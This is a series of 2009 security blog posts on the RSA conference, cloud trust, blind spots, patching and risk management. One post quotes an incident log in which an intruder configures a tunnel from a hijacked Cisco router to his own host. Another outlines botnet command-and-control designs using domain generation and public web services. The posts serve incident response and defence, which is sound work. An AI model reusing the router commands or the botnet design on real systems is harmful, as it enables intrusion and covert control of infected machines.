I was reviewing my notes about RSA to prepare a series of posts about what I saw there during last week. I've got a sense of disappointment since last Friday that was preventing me from writing anything good about it. I started to think about all this and also about some of the things that I see as key for the evolution of information security, and I end up with some thoughts that should be in a separate post. Another one about the RSA sessions I attended will follow. For now, let's try to solve all security problems :-)  If there is anything that shouldn't be ignored about current security (and IT in general) discussions is "the Cloud". A quick walk around the vendor booths on RSA would show that this is the hot subject of the day. Cloud Computing is the explanation about why things that were hot last year were not so strong this time. NAC and DLP were everywhere in 2008 (Anton noticed they disappeared too), now everything is "cloud based" and virtualization. In fact, when you consider the cloud services model you'll see that the priorities have indeed changed. One of the key concerns from security professionals until a few months ago was Authentication related issues.  Within the cloud, however, it looses some importance. Of course, applications still need to authenticate users, but if you try to authenticate all the IT components that you are interacting with in a cloud model, you are lost. At some point in the near future you'll probably be in a situation where you don't know where you data is being processed and stored (outside your organization - that already happens inside it :-)). So, the hot word today is "Trust", not "Identity". The cloud model is one of the signals that the Jericho Forum is reaching its goals. Now, more than ever, controls need to be on the endpoint and not on the network. And then, when all the security apparatus is on the endpoint, who that endpoint should trust on? A sad conclusion from this new world is that transitive trust is an illusion. Do you trust in the service provider of your service provider? The regulatory maze required to make transitive trust work on the compliance side and the immeasurable complexity required to do that on the technology side have condemned transitive trust in the cloud. We need something different if we really want to have information security commensurate to our risk posture in the cloud. But I'll come back to this later. Most of innovation presented during RSA could be seen as evolutionary innovation. There was no disruptive innovation at all. But I wonder if there is room for disruptive innovation in security at all. The abrupt changes (and disruptive innovations) come from other places, new business models and technologies. It is naive to expect that those new ideas will be born with security "built in" (I'm talking about the concepts, now necessarily the products). Under this perspective, security will always be an afterthought and, as it will be following something instead of defining the way, there won't be no sharp turns. Security will always be essentially evolutionary.Ok, but with those "sharp turns" (Web 2.0, cloud computing) from business and technology, what should we expect from security? Let's use the security cliché of People, Process and Technology to have a better view:

  • People and process

Hey guys, time to get your eyes out of the debugger. I mean, there's a lot of great content being produced on the validation/verification side, people confirming those very small chances of exploiting a specific product or technology. In other words all those guys "making the theoretical possible". Don't get me wrong, this kind of research is critical to our field, but it seems that everybody now wants to do it. We need more people that can look into the problems in a different perspective, bringing concepts and ideas from other fields, like psychology (Schneier is doing it), biology (Dan Geer) and economy (Ross Anderson). All these fields have evolved a lot and we can get a lot of new ideas from them to apply to security. We can use them not only to improve technology but mostly to improve our processes, our risk management and assessment methodologies and the way that we think about risk and security. How can we still be discussing "compliance x security"? We had Malcolm Gladwell as keynote last year on RSA presenting the ideas from "Blink" (his book at that time) and I still haven't seen anything created in security using that valuable information about how people think. Just think for a minute how those instintive decisions mentioned on Blink affect things like security awareness and incident response. You'll be amazed about how much we can use from that in our job.

There is also an old discussion about the profile of the security professional. This is one of the favourite topics of my friend Andre Fucs. Although I think it's a very important discussion, I'm not really interested in it right now. As I'm listing things that I believe we should work to improve and I included "People" as a component, it is important to mention that.


  • Technology

I'm seeing these days a lot of people bashing Bruce Schneier because he said that there's nothing new in Cloud Computing. Even if I partially agree with the criticisms, I think there is some true in that affirmation too. Yes, there is a lot more flexibility and mobility in the cloud model, but there's nothing new in terms of technology. Almost everything we need to do our jobs have been invented already. We just need to look into our huge toolbox and identify what we need to use under these new conditions.

I think the relation between the cloud and virtualization curious. Virtualization is being pointed as a way to implement the necessary platform independence and resource democratization that characterizes the cloud, but I believe we are just wasting resources by going into that direction. A few years ago Java (or, being more generic, "bytecode" stuff) seemed to be the way to go to achieve that platform independence. So, why put layers over layers of OSes if we can do what is needed using different OSes? Remember the "Write once, run everywhere"? Maybe this is not the best time to talk about java, anyway.

We are also pushing a lot of things to the endpoint. See what is being done with AJAX, all those mashups. And how are we trying to secure the endpoint nightmare? Sandboxes! How will sandboxes work with a technology that requires you to integrate all those things from different sources and trust levels exactly AT the endpoint? I really can't see a sucessful sandbox implementation under Web 2.0 reality.

Why am I talking about virtualization and sandboxing? Because both, when we talk about security, are solutions to a problem that we may know how to solve by better approaches. We are doing that because we are using crappy Operating Systems. I don't want to sound like Ranum and say that we need to write everything from scratch again, but let's assume, for instance, that we have decent Operating Systems; why would I bother to create virtual OS instances when I can put all my applications running above a single (more effective and secure) one? Why should we worry about VMotion when we can just move applications? The mainframe guys are running different applications in the same OS instance for years, being able to secure them against each other and effectively managing resources and performance. Let's learn from those guys before all of them are retired sipping Margheritas in Florida.

Ok, even if we solve the issue inside the same organization, there's still the issue of dealing with multiple entities in the cloud model. Again, the problem is Trust. As I said before, transitive trust is an illusion and if we try to rely on it we will see a whole new generation of security issues arise. I honestly don't know how we will solve it, but one of my bets would be in reputation systems.

In fact, the business model of the cloud is not different from lots of things we do in the "real" world. We trust people and companies without knowing all their employees or all other parts involved in ther business processes. We do that based on reputation. A nice thing about it is that we can leverage some of the cloud characterics to implement huge reputation services. Reputation databases can share, correlate and distribute information just like we do with names on DNS, with small and distributed queries. Let's imagine a new world of possibilities for a moment:

Your dynamic IT provisioning systems constantly gets information about processing costs from cloud services providers. It finds the best prices and acceptable SLAs, triggering the process to transparently move your applications to the best providers, keeping you always at the lowest available "IT utility" cost. Eventually, someone may try to include theirselves in the "providers pool" to receive your data into their premises to abuse it. However, your systems will not only check for prices and SLAs. They check the reputation for each provider, allowing the data to be transfered only to those that match you risk decisions. Just think about a database with reputation from several different providers, like Amazon, Google, GoGrid and McColo.v.2 (!). The  database will be constantly fed with information about breaches, infected/compromised systems on each of those providers, vulnerability scanning results, abuse complaints. Everything mixed by mathematical models that will tell you which one you should trust your data to. That's for the cloud. Reputation can even be used to help end users systems to decide the trust level for each application they run (Panda and other AV companies are going in this direction). Future looks promising.

A good call from one of the RSA keynotes was from Cisco CEO John Chambers. He talked about collaboration and integration. I really was expecting to see that at the Expo floor, but there wasn't anything really special. I was expecting to see more about IF-MAP, didn't see anything even from Juniper. Tipping Point CTO Brian Smith presented how their view of how the integration of different products can improve or, in fact, transform the way that we do firewall rules. Getting tags from different systems (reputation based systems?) and building the rules based on tags, that was awesome. One of the few high points of RSA to me. I was planning to do a review of RSA and end up writing something like "my view of the current and future state of information security". It's probably poorly organized, not well fundamented, but I intentionally decided to keep it this way. I want to make it a "food for thought" stuff. As usual, comments are welcome. Have fun.

Wednesday, April 22, 2009

RSA so far

So, trying to do a quick review of the first day:

Nothing really special from the keynotes. Funny to see that some people complained about Scott Charney, from Microsoft, doing a "vendor presentation". Actually I found his presentation better than the others (RSA, Symantec), as he didn't try to hide the fact he was talking about the roadmap of his products. I really don't like those vendor presentations where they show the current challenges exactly in the way that their last product is the perfect fit. Charney at least was honest about what he was showing.


The best session, as usual, was the Cryptographers panel. I was happy to hear their concerns about "Black Swans".  Bruce Schneier also mentioned his studies on Security Psychology. What I'd want to see now is how these things affect our current risk management methodologies.

After that, I watched some technical presentations, one of those about the new edition of "Hacking Exposed". Nothing really new there.

Stephan Chenette, from Websense, talked about script fragmentation attacks. Basically, javascript code being transfered in very small chunks through AJAX to evade detection, mostly by Web filters. The attack relies on code that will pull those small chunks and reassembly the exploit in order to execute it, what he called the "decoder". I think that one of the challenges of this attack is to avoid the detection of the decoder. Even if code from "non-malicious" libraries is used, I think there's still room for detection based on "decoder behaviour". An interesting part was when he mentioned cross-domain transfers to get the exploit, there are endless possibilities to explore in that direction. Decored could find (and grab)  the exploit pieces through Google searches, and those pieces could be inserted in apparently innocent comments on blogs and social networks. A lot of room to explore here.

After that I went to see some of my favorite security bloggers on the "security groundhog day panel", hosted by Mike Rothman. Some good discussions about PCI, cloud computing and compliance. It gave some ideas to write about these subjects, I'll try do it after the conference. Best quote from the conference until now was from Rich Mogull, "you need to know your own business". Dead right.

After that, Jeremiah Grossman presenting the "top 10" attacks. Nice, but I could have just read the paper and used that slot for another presentation.

And day one was over. To be honest, nothing really special until now. Let's see if I can see something nice on the expo booths.


Media_httpimgzemantac_lfzgf

Do no evil?

That's Google motto; however, there is really some room for thinking after watching the presentation from Ira Winkler. The most interesting thing is not only the huge amount of data that Google has, but their posture on inquiries and complaints about them. Still, they are usually seen as a "cool" company. As Ira said, what would be the public reaction if those services provided by Google were being offered by the government?

It's funny to see this trend on "cool companies". Google and Apple are the best examples. I think they posture over security and privacy concerns are deeply rooted on this "coolness" perception. Nobody think they are evil, so why bother trying to convince those few paranoid guys that have doubts?

As a side note, the first person that I heard was using Google Latitude is the most paranoid guy I know. What are those companies doing to be so trusted?

Media_httpimgzemantac_cetcz

Tuesday, April 21, 2009

RSA

OK, a bit late, but here I am. I've just found time to write about RSA now, 40 minutes before the first keynote. I'm really curious about how the conference will look like after all this economic rollercoaster we've been through.

It's also my first time as "press". That makes me feel a little more obligated to blog about it, so I'll try to put my impressions about the sessions I attend. Let the show begin!

(and hey, if you are here and want to meet, just drop me a line on my email (augusto at -blog-url) or Twitter (@apbarros).

Media_httpimgzemantac_pmitt

Saturday, April 11, 2009

Here it is, that potential vulnerability now is true

Run code on the host from a VM. That was something that everybody who had taken virtualization with a grain of salt when talking about security has been talking about. Today VMWare is releasing a patch for a vulnerability that allows that to take place. Scary.This is a reminder for you to avoid excessive resource sharing by VMs from different trust levels, like DMZ and internal servers. When you put VMs from different isolated network segments running in the same host you are creating a potential bypass for the whole network segmentation infrastructure.Additionally, it's interesting to think about the implications of having your VMs running on a cloud service provider, together with VMs from other organizations. As we don't know about their security posture it's better to assume they are owned, for security planning purposes. That means that if the service provider does not patch his host systems in time your VMs will be owned too. So, what's the policy of your cloud services provider about these issues? Time to ask them.
UPDATE:
I've just seen a very nice video showing an exploit for this vulnerability in action. Check it here.
Media_httpimgzemantac_rehgg

Monday, April 6, 2009

Interesting webinar from IBM

IBM has scheduled a interesting webinar for April 15th. I don't know if it will be entirely "see how nice our product's features are", but as I've been recently blogging about how middleware happens to be a frequent blind spot, that may be something interesting to follow. You can also see some interesting posts from Gunnar Peterson about it.Details about the webinar:Middleware Security Holes You Need to Know About:  They Increase Risk of Breaches, and Will Make You Non-Compliant with PCI  April 15th, at 12 Noon ET; 9 am PT

With T.Rob Wyatt of IBM

The Heartland Payments breach is another case where hackers were able to compromise the "soft center" inside the corporate network. One of the major security holes that remains unplugged in many organizations is middleware, especially middleware used for application-to-application and application-to-DB communication.This webinar will feature the expertise of T-Rob Wyatt who is an IBM security consultant focusing on IBM Websphere MQ, which has been implemented by over 15000 enterprises around the world.  T-Rob will talk about some of the security problems he has found working with merchants, payment processors and other enterprises, most of which have been missed by PCI assessments, often because PCI QSAs are not familiar enough with MQ series and other middleware to evaluate the security of the configuration.This webinar will be very valuable for merchants, banks, PCI assessors and anyone else who is not sure what middleware vulnerabilities they have and how to make the changes to eliminate them.SPEAKER:  T-Rob Wyatt - Senior Managing Consultant, IBMTopics to be discussed include:** What are the major middleware vulnerabilities?** What organizations still have these vulnerabilities?** What is required to eliminate these vulnerabilities?** What should organizations do near term to solve this problem?

Would you mind to explain how your security works?

Sometimes it's funny to see the face of people when you ask that. Sometimes it is about an organization, sometimes about a product. Usually, the answer comes in form of a bunch of acronyms, standards and nice phrases like "risk management process". Fun starts when there's also stuff like "100% secure", "certified against hackers" and "military grade encryption".What is surprising to me (and to others too, as I noticed here) is that sometimes the questions are unexpected. Not only generic questions about the security of a service provider or a product, but also questions about security details of them. I'm not surprised that the answers are crappy, I'm surprised that they are surprised about the questions! Hey guys, are you asking the right questions to the vendors? I remember working for a card processing company and asking some software providers about the security aspects of their products, they didn't know how to answer them. Worse, they would eventually reply "company A, B and C are using it and nobody there asked us about it". What kind of questions they are hearing? Stupid things like "is this software PCI certified?"(!) "is it SOX certified?" (!!!) "is it ISO27001 certified?" (!!!!!!!!). It's not hard to see why there's so much bullshit about security from vendors, there are people out there buying (and enjoying) it.Decently secure services and products will only be available when buyers start to (properly) ask for it. If nobody is asking, why will they bother about it?

Too much good content on the blogosphere

I must say that I should be writing ten times more than I'm actually doing these days. The main reason is that the subjects that I've been interested in writing about are so great that I don't want to just throw a simple post about them. I'm trying to give some room to my thoughts on them before writing down something, but I decided to at least point to what is making me think lately. The three subjects are:

  • The Information Security profession: I talked for some minutes about it with my friend Fucs. He posted something about it in his blog and started a discussion on Linkedin. I have my own thoughts about it and I'll write about them here too.
  • How to improve security as a whole, or how to improve security decision making. I sent a proposal for a RSA presentation on it, that was not accepted. Our current risk assessment and management models don't seem right to me, and I have a perception that most of security decisions, roadmaps and strategies are simply fairy tales. I was glad to see the last rants from Marcus Ranum, where he pointed to a lot of those things. I'm not as pessimist as him, as I think we can find alternative ways to think about security and to have better decisions about it. A lot of the issues he mentioned are old facts about society and corporate culture, they haunted Quality and Safety disciplines far before they started to be a problem on information security. I believe we should look to our past for things like that and try to find how we have managed to find a balanced state for them. Maybe we haven't, and we just need to figure out how to deal with that too.
  • The last one, again something from my conversations with Fucs too. This time, some new ideas about botnets Command and Control systems, improving things we presented in 2007 at Black Hat Europe. Conficker has come implementing some of those concepts, and we are seeing how well (or how bad) they worked and what could be done to improve it. I must say we have some great ideas, but I would really like to find something more on the detection and defence side before going into a presentation again about it. Let's see where our chats head us to in the near future.
Basically, that's what's in my head now. Feel free to drop comments on them if you want :-)

Media_httpimgzemantac_uozcj

Thursday, April 2, 2009

MQ, one of the blind spots

I've recently wrote about security blind spots, those things inside organizations that bring high risks but are usually not seen during risk and vulnerability assessment activities. Gunnar Peterson mentioned on his blog one of the most common blind spots for big organizations, MQ Series. This is related to the mainframe problem that I wrote about on my article about blind spots. As Peterson says, "MQ Series was designed for a benign environment not a hostile one. Because the mainframe plays a central role in many companies' culture they continued to connect the way they always had, and the inspectors (auditors, pen testers) didn't really notice because they focus mainly on the front door". That's really interesting. Security assessment usually pass far away from these very important points, because when scope definitions are made they are not considered "high risk" areas. The problem is that nobody has ever gone through a thorough review on those areas to identify the risk, people just decided that "the mainframe is secure", as there's nothing in the news or even mainframe exploits being published for Metasploit. That's not the case. Those vulnerabilities are from that class that you don't an exploit, just some inside information. Today, with all those massive lay-offs, do you still think that this kind of information won't be available to potential attackers?

Monday, March 30, 2009

Blind spots

I was reading this post from Richard Bejtlich today and I found this quote from the Verizon Security Blog:"With the exception of new customers who have engaged our Incident Response team specifically in response to a Conficker infection, Verizon Business customers have reported only isolated or anecdotal Conficker infections with little or no broad impact on operations. A very large proportion of systems we have studied, which were infected with Conficker in enterprises, were “unknown or unmanaged” devices. Infected systems were not part of those enterprise’s configuration, maintenance, or patch processes.In one study a large proportion of infected machines were simply discarded because a current user of the machines did not exist. This corroborates data from our DBIR which showed that a significant majority of large impact data breaches also involved “unknown, unknown” network, systems, or data."Last year I wrote an article for the ISSA Journal, "Security Blind Spots". It was exactly about "unknown or unmanaged" stuff in the network. Windows boxes that can be infected by worms like Conficker are an easy example of blind spots. Last week I was talking to a vendor who offers one of his solutions in an "appliance version". The other option, the software version, runs on a Windows Server. When I asked for more information about the OS on the appliance I found that what they were calling "an appliance" was nothing more than a regular Windows box. Almost not hardening at all, with the negative impact that Microsoft patches would be distributed together with the vendor's quarterly updates. Now, if you are in charge of a patch management process, do you prefer to deal with an additional regular server (that perfectly integrates into you patch management systems) or with a "black box" that will become a unpatched Windows box that nobody is aware that is there?This is starting to be common for Linux and Windows based "appliances". Beware of the "lower support cost" options like that, if you have processes and tools in place to deal with those OSes in your network they may be more a problem than a solution.

Intrusion detection - not only network IDS

Sometimes we spend so much time discussion network based IDS that we end up not looking at other interesting places to look for intrusion signs. There is a very nice post on SANS ISC Diary today about an organization that has one of its border routers compromised and detected it through a periodical configuration file check. I'll put the whole post here as it is very valuable to illustrate not only the need to look for problems in more than one place but also how you can improve your response process by being prepared for those situations:
"ISC reader Nick contacted us to share information about an Internet router at his workplace that got hacked this weekend. There's several nuggets to learn from in this story, so here goes.3/28/2009 8:34:02 Authen OK test3/28/2009 8:34:04 test Default Group where <cr>3/28/2009 8:34:05 test Default Group who <cr>3/28/2009 8:34:13 test Default Group who <cr>3/28/2009 8:34:19 test Default Group show version <cr>3/28/2009 8:34:23 test Default Group who <cr>A successful login of a user "test" is definitely not a welcome sight in the TACACS authentication log of an Internet router. And the commands that follow are a clear indication that something sinister is going on. We know since Cliff Stoll's experience that somebody who needs to constantly look over his shoulder while connected (issuing the "who" command) isn't up to any good.At this time though, Nick's firm didn't know this yet ... And the command log continues3/28/2009 8:38:38 test Default Group show configuration <cr>3/28/2009 8:38:59 test Default Group show interfaces <cr>3/28/2009 8:39:48 test Default Group configure terminal <cr>3/28/2009 8:39:50 test Default Group interface Tunnel 128 <cr>3/28/2009 8:39:57 test Default Group show interfaces <cr>3/28/2009 8:41:48 test Default Group configure terminal <cr>3/28/2009 8:41:49 test Default Group access-list 20 permit 192.168.2.2 <cr>3/28/2009 8:41:50 test Default Group ip nat pool new [removed] netmask 255.255.255.252 <cr>3/28/2009 8:41:51 test Default Group ip nat inside source list 20 pool new overload <cr>3/28/2009 8:41:52 test Default Group ip nat inside source static tcp 192.168.2.2 113 [removed] 113 extendable3/28/2009 8:41:52 test Default Group interface Serial 1/0 <cr>3/28/2009 8:41:53 test Default Group ip nat outside <cr>3/28/2009 8:41:53 test Default Group interface Tunnel 128 <cr>3/28/2009 8:41:53 test Default Group ip nat inside <cr>3/28/2009 8:41:54 test Default Group ip address 192.168.2.1 255.255.255.0 <cr>3/28/2009 8:41:54 test Default Group ip tcp adjust-mss 1400 <cr>3/28/2009 8:41:55 test Default Group tunnel source Serial 1/0 <cr>3/28/2009 8:41:55 test Default Group tunnel destination [removed] <cr>Whoa! The bad guy is not wasting any time. Barely five minutes after connecting, and he has configured a network tunnel back to his home base.3/28/2009 8:47:23 test Default Group configure terminal <cr>3/28/2009 8:47:26 test Default Group line console 0 <cr>3/28/2009 8:47:32 test Default Group password *****3/28/2009 8:47:45 test Default Group who <cr>3/28/2009 8:47:55 test Default Group configure terminal <cr>3/28/2009 8:48:01 test Default Group line vty 0 1052 <cr>3/28/2009 8:48:06 test Default Group password *****3/28/2009 8:49:12 test Default Group no transport input <cr>3/28/2009 8:49:26 test Default Group transport input ssh <cr>As a next step, the bad guy changes the locally configured passwords. This doesn't make much of a difference, since these accounts only are used when the central TACACS database is not reachable. While the hacker shows quite some familiarity with setting up an IP tunnel on a Cisco router, he doesn't seem to fully grasp the significance of the TACACS entries in the configuration: since TACACS includes accounting logs, all his commands get recorded.At 08:52, the bad guy logs off, and Nick's firm is still completely unaware that their perimeter router has just been subverted. But not for long: At 09:00, their "RANCID" script kicks in, pulls the current configuration off the router, compares it with the "last known good" configuration, and immediately e-mails the changes to the network admin. Luckily, the admin understands the significance of what he sees right away, and alerts the incident response team. A while later, the "test" user is removed, the config is cleaned up again, and the bad guy is locked out.Nick's own "lessons learned" that he shared with us are:- Disable outside management of Internet routers unless 100% required- Log!! Log!! Log!!- Review logs, review logs, review logs.- Dont use easy usersnames/passwords.- Talk to people, this includes ISP's. Get the word out of wrong doing.- Dont hack back...(we didnt, but people sometimes feel the need to retaliate). This is against the law.- Keep router firmware upgraded.To which we at SANS ISC would like to add our own- What saved the day here is the use of "RANCID", which acted like a trip wire. Something the bad guy clearly didn't expect- Having a privileged user named "test" with a guessable password is of course unwise. But mistakes happen all the time - that's why we security folks all strive to build our defenses in a way that one single mistake isn't enough to sink the ship. Defense in depth works!Thanks to Nick for sharing the logs and information about the attack!"

Friday, March 20, 2009

Patching the cloud - Azure failure

Hoff posted some nice comments on the Azure's failure regarding patching the infrastructure used by cloud services. An interesting conclusion about it is that future patching mechanisms will have to be integrated to VMotion-like features, in a way that when you apply an OS patch to the infrastructure it can dynamically deal with that without disrupting the service. It would be something like this:

  1. Move the virtualized hosts from one server to the others

  2. Patch it the "idle" server

  3. Check if it comes back properly

  4. Gradually puts back the load on that server and checks if there is any impact from the patch

  5. If everything is ok, go back to step #1 for the next server - repeat until all servers are patched
I wonder if the guys from Microsoft Update are talking with the Azure team - big challenge for team integration ahead, and business opportunity for patch management companies.

Tuesday, March 17, 2009

Cognitive Dissonance? I must disagree

I like the spin that Pete Lindstrom gives to some classical security discussions, but I think he is completely missing the point here:"If finding vulnerabilities makes software more secure, why do we assert that software with the highest vulnerability count is less secure (than, e.g., a competitor)?"If we agree with him we could also say that cities where more criminals are caught and sent to jail are more secure than those that catch less criminals. I could then argue that in order to become more secure a city should stop putting criminals into jail.There are two separate problems. One is to avoid new criminals (or to avoid adding vulnerabilities to code). The other is to deal with those that are already there (finding bugs). Dealing with the first problem is the best approach as you will spend less with the second, but you cannot just let the current criminals "working" until they "retire".With crime we can know how effective the measures to prevent the creation of new criminals without necessarily working to put the current ones into jail. You just need to keep numbers on crime occurrences. But for vulnerabilities we need discover them in order to know if the developer is doing a good job on avoiding them. We can accept the fact that an unknown vulnerability has no risk, but I don't think it's a good idea to wait until people with malicious intent start finding holes in the software I use to know if that developer is good on writing secure code or not. At that time, it's too late.

Thursday, March 12, 2009

Attack Vector Risk Management

I read this post from Michael Dahn and I really liked what he called "Attack Vector Risk Management". Today I saw that the guys from Sensepost also noted the post for the same reasons, and even showed some of their work under the same concept, calling it "Corporate Threat Modeling".

During the last months my main interest is enterprise security planning. How should an organization define how to spend its security resources, what should be done and in what order? Risk Management is usually the answer for that (please DON'T SAY COMPLIANCE!), but IMHO the risk assessment methodologies out there just don't scale to a point where they can be used to drive security decisions in an enterprise level. You start using so many "educated guesses" that the end result is just not intellectually honest, everything is extremely biased to what people believe that are their major risks that just a simple brainstorm would probably generate the same results. Have you ever seen the results of an enterprise level RA being a surprise to anyone (except for dumb as hell CISOs!)? I haven't.

I don't think that Sensepost approach escalates well too, but it seems better than regular RA for me. I believe we can come tom something that is "threat oriented" than can generate a better understanding of an organization security requirements and help the development of a security strategy. After that we will finally be able to bury ROI/ROSI stuff and stop pretending that those beautiful tables with numbers, "high/medium/low"s  or "green/yellow/red"s are something more our minds tricking us into believing that there is a mathematical explanation behind our intuitive perception.

Until there, you can read "Blink", from Malcolm Gladwell (yes, the guy from the current best seller, "Outliers"), to see that simply trusting our intuitive side is not that bad, although I just can't see a CISO telling an auditor that his security strategy is "intuition based" :-)

Media_httpimgzemantac_fnrld

Web Application Security, what about your logs?

As usual, another very nice post from Mike Rothman, this time about application security. He is mentioning the BSI-MM model, that I mentioned here too in the context of measuring the outcome of security measures.Mike also mentioned, again, the need to REACT FASTER (have I said how nice his "Pragmatic CSO" stuff is?) and linked it to the application security world. As I'm working a lot with log management these days I noticed that I'm not seeing people talking about what to do with their Web and application server logs. A lot of attacks against web applications can be identified in the logs, and yet we don't see people collecting and analyzing them. Is there anybody out there with good results on "web log" correlation? I'd like to see how evolved this is and how can it help as an early warning system for attacks against web applications.

Saturday, March 7, 2009

Pseudo-random algorithms use by malware

Back in 2007 I noticed (together with Fucs and Victor) that botnet creators had to solve a very important issue to keep controlling the infected computers: how to update the location of the controller?Until then they were including the controller location inside the bot code, so it was easy to find to identify it and block/take it down. Updates could be used to turn existing bots to a new controller, but new infections wouldn't be able to find the original controller to get the updates. We predicted (and we really nailed it!) that pseudo-random algorithms would be the natural choice to avoid including URLs (or other location-type info) in the malware code.The difference from our original work and what is happening today is that most botnet authors are implementing that to generate DNS names. The problem (for them) on that they create the need to register the names that will be created.  There are usually costs and a process to be followed to register new domain names, so I really don't think they are being very effective. We envisioned that they would use one (or some) of those new applications like P2P protocols, Skype, and general Web 2.0 stuff that includes search capabilities to drop information from the controller to the bots anonymously on the web and just let them search for it. We presented a proof of concept based on Skype at that time. We went far enough to say that they could even eliminate the need for a centralized command and control host by directly dropping the commands to the bots instead of the C&C location. Digital signatures would be used to reduce the risk of someone hijacking their botnet.Since then I've seen a lot of new possibilites to implement those concepts. Twitter, Wikipedia, Facebook, there are lots of new applications than can be used as reliable communication channels between the controller and his bots. There's not doubt that botnet creators are skilled programmers, but I think they still lack some creativity on the design part. As we said on our 2007 preso, things are not half as nasty as they can be. I can see that in a very short time we may see botnets that have their C&C entirely "Cloud based". Yet, we haven't evolved at all in our detection capabilities. How should we react to new threats if they get a boost on design?We need to start to think about how to design a next generation world-wide distributed monitoring solution, an "in the cloud behaviour anomaly intrusion detection system". Is there anybody out there working on something like this?